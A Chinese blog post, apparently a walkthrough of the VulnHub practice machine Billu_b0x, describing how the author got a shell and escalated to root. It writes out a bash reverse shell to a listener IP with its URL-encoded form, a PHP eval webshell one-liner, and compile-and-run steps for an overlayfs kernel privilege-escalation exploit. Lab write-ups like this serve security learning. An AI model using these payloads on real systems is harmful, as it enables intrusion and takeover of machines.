vulnhub-Billu_b0x(getshell成功)

最新推荐文章于 2022-11-07 10:22:34 发布
最新推荐文章于 2022-11-07 10:22:34 发布
阅读量1.6k 收藏
点赞数
分类专栏: 文件上传 webshell 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43006864/article/details/123815315
版权

这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟

上面一篇文章开始。

开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash

 

 需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象,

   编码后  :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%2e%31%31%33%2f%34%33%32%31%20%30%3e%26%31%22%20%7c%20%62%61%73%68

 

 kali开启监听:

 

传入命令:

成功get:

查看靶机版本信息:

发现linux版本:Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux

这个版本有本地权限提升的exp可以使用。附上连接:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit

下载完后,还需要进行exp文件上传。这里的图片马用菜刀是没法连接的。所以需要重新写入马子:

echo '<?php eval($_POST['shell']);?>' >> shell.php

 

写入成功,进行连接。

上传完成后。对exp进行赋权。

 

进行编译:

gcc 文件名.c  -o  编译后的文件名

运行: ./编译后的文件名

提权成功查看权限和当前用户:

到此结束,重点就是nc监听哪一步,老实弹不回来。

 

 

 

 

 

 

 

大西瓜的安全之路
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机渗透测试实战(八)——Billu_creat_Files渗透实战
橘子女侠
05-11 2521
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
vulnhub(billu_b0x)实验
m0_49336519的博客
09-16 252
vulnhub(billu_b0x)实验 环境搭建 靶机下载地址 https://download.vulnhub.com/billu/Billu_b0x.zip 环境配置 1.靶机(billu_box) 2.攻击机(kali,win7) 3.靶机和攻击机都设置NAT模式 攻击演示 获取靶机IP 使用nmap扫描NAT网段上线的主机:nmap -sP 192.168.1.0/24 端口扫描 通过端口扫描发现服务器开放的服务信息 访问web站点 发现sql注入(靶机提示) sql注入测试 1.通过
[[IndiShell Lab]]靶机实验
qq_42890862的博客
06-30 652
一、nmap扫描192.168.6.0网段存活主机 二、扫描各个ip的80端口是否开启(发现192.168.6.1/10/12/105中80端口开启) 三、测试发现192.168.6.12为目标网站,对其进行详细扫描 四、进入该网站首页 五、通过目录扫描,发现以下目录root@kali:~# dirb “http://192.168.6.12” 六、进入到各目录页面中 此页面提示有蹊跷!!!! 七、在url中写入路径发现页面没有变化,则判断数据提交方式为post,在test.php页面中使用hackbar
ubuntu查看系统版本和linux内核版本
热门推荐
haohaibo031113的专栏
04-27 3万+
sudo lsb_release -a hhb@ubuntu:threads$ sudo lsb_release -a [sudo] password for hhb: No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 14.04.1 LTS Release: 14.04 Codename:
Vulnhub 靶机 Billu_b0x
干铮的博客
10-10 900
1.主机发现 ping扫描 Nmap -sP 192.168.43.0/24 端口扫描 Nmap 192.168.43.217 -A -p- -oN nmap.A C:\Users\ASUS>Nmap 192.168.43.217 -A -p- -oN nmap.A Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-09 14:29 ?D1ú±ê×?ê±?? Nmap scan report for indishell (192.
海贼王渗透靶场 Vulnhub:Billu_Box
qq_47168481的博客
09-26 630
海贼王渗透靶场
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
billu-b0x靶场渗透
最新发布
11-14
billu-b0x靶场渗透
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
VMware-ovftool-4.4.0-15722219-win.x86_64.rar
05-03
《VMware ovftool在虚拟化管理中的应用与问题解析》 VMware ovftool,全称为OVF Tool,是一款由VMware公司推出的强大工具,主要用于处理OVF(Open Virtualization Format)和OVA(OVF Archive)文件,是虚拟化环境...
渗透靶场——Vulnhub:Billu_Box
tlovejr的博客
02-25 1028
部署环境: 提供镜像文件后,直接用虚拟机打开即可(中间会遇到错误什么的,直接点击重试或者继续即可),连接方式用NET方式连接。 Kali机ip地址:192.168.40.129 靶机ip地址:192.168.40.149 首先查看存活的靶机ip地址,在这里一共有三种方法,可以自己选择一种自己比较喜欢的。 nmap探测存活主机 Nmap -sn 192.168.40.0/24 Netdiscover探测存活主机(时间会有点长) netdiscover -i eth0 -r 192.168.
Vulnhub靶场渗透Billu_box
paidx0
09-10 295
靶机说明 难度中等 目标:从web应用程序获得 root权限 运行环境:靶机ip(192.168.110.127)攻击机kali(192.168.110.128) 信息收集 常规简单的端口扫描,目录扫描 漏洞挖掘 访问 80端口,打开提示是 SQL注入 简单万能密码试了一下不行,丢sqlmap也没跑出来暂时就不管他了 把上面扫出来的目录挨个打开 in.php 里面是 phpinfo() add.php 是一个上传页面 phpmy 是 phpmyadmin登录页 test.php 是一个 测试页面,存
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3794
CTF综合靶场渗透系列-Billu_b0x
vulnhub靶机 -- billu: b0x
weixin_46107179的博客
05-11 330
靶机下载地址:下载地址 搭建好环境,进行主机发现靶机的ip地址为192.168.137.147 对其进行nmap扫描,进行端口发现(22,80) 访问80端口,发现是一个登录框,叫我们尝试SQL注入,用简单的弱口令以及sqlmap跑不出来,然后尝试用burp的SQL字典来跑,跑出来了; 这里通过抓包,将其需要爆破的账号密码添加字典,并且选择cluster bomb模式 第一个字典可以选择kali里面自带的Fuzzing里面的SQL字典 第二个字典,可以就用burp自带的字典,自己添加一下键盘上的所有可
Deepgreen与Greenplum TPC-H性能测试对比(使用VitesseData脚本)
chuanggangbo5551的博客
06-14 95
摘要:前两天发了一篇基于[德哥测试脚本]的测试对比文章《Deepgreen与Greenplum TPC-H性能测试对比(使用德哥脚本)》,由于测试数据量少,两个数据库有几轮测试都是1秒持平,但是大多数测试Deepgreen均优于Greenplum,有的甚至快至百倍,感兴趣的朋友可以再回头看看...
靶机渗透练习09-VulnCMS
hirak0的博客
04-15 1994
靶机描述 靶机地址:https://www.vulnhub.com/entry/vulncms-1,710/ Description This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag. Hint: Proc
[ 转]渗透测试实战-billu b0x2靶机入侵
zgy956645239的博客
03-01 819
billu b0x2靶机 老规矩 nmap 开路 通过探测可以看到该靶机一共开放了5个端口,我们还是把目光放在80端口上 访问如图: 看到底下 该网站使用了 “Drupal”框架搭建,前几个月该框架曝光过一个高危漏洞,根据这些靶机的惯用尿性,应该是存在该漏洞的。通过MSF来搜索该漏洞,如图: 发现有漏洞,调用模块输入ip和payload,如图: 成功拿下shell。。。。 如图:...
[VulnHub靶机渗透]一:billu_b0x
qq_45927819的博客
03-06 2906
文章目录实验环境实验步骤一、信息收集1.1 扫描主机所在网段进行主机发现1.2 端口扫描1.3 网站指纹信息扫描(whatweb)1.4 dirb爆破Web目录二、web渗透2.1 ssh爆破并获取shell2.2 web站点渗透2.2.1 index.php(登陆界面)2.2.2 add.php (空壳文件)2.2.3 test.php(文件包含可利用)2.2.4 phpmy (phpmyadmin)补充:2.2.5 phpmyadmin挂马2.2.5.1 利用outfile写文件挂马**2.2.5.2
网站后台getshell的方法总结
anlalu233的博客
03-24 4862
方法一:直接上传getshell 以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下: 即可成功上传大马,并成功执行,从而拿下webshell。 坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名 方法二:数据库备份getshell 以南方数据cms为例: 1,首先上传一张...
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2308
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值